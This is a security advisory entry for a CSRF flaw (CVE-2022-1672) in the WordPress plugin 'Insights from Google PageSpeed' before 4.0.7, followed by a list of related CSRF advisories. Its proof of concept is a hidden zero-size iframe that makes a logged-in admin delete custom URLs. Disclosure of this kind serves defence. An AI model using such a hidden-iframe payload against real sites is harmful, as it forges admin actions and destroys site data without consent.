Insights from Google PageSpeed < 4.0.7 – Multiple CSRF | CVE 2022-1672 | Plugin Vulnerabilities

Description

The plugin does not verify for CSRF before doing various actions such as deleting Custom URLs, which could allow attackers to make a logged in admin perform such actions via CSRF attacks

Proof of Concept

<iframe src="https://example.com/wp-admin/tools.php?page=google-pagespeed-insights&render=custom-urls&action=delete&page_id=1" width="0" height="0" frameborder="0"></iframe>

Affects Plugins

google-pagespeed-insights

Fixed in 4.0.7

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://daniel-ruf.de

Verified

Yes

WPVDB ID

5c5955d7-24f0-45e6-9c27-78ef50446dad

Timeline

Publicly Published

2022-06-27 (about 1 years ago)

Added

2022-06-27 (about 1 years ago)

Last Updated

2023-04-02 (about 1 years ago)

Other

Published

Title

Published

2023-11-21

Title

UserPro < 5.1.2 - Cross-Site Request Forgery via multiple functions

Published

2023-11-13

Title

Contact Forms by Cimatti < 1.6.1 - CSRF

Published

2023-07-27

Title

CartFlows Pro < 1.11.13 - CSRF

Published

2023-07-26

Title

WP Tell a Friend Popup Form <= 7.1 - Settings Update via CSRF

Published

2021-07-05

Title

CRM: Contact Management Simplified – UkuuPeople <= 1.6.3 - Unauthorised Favourite Addition/Deletion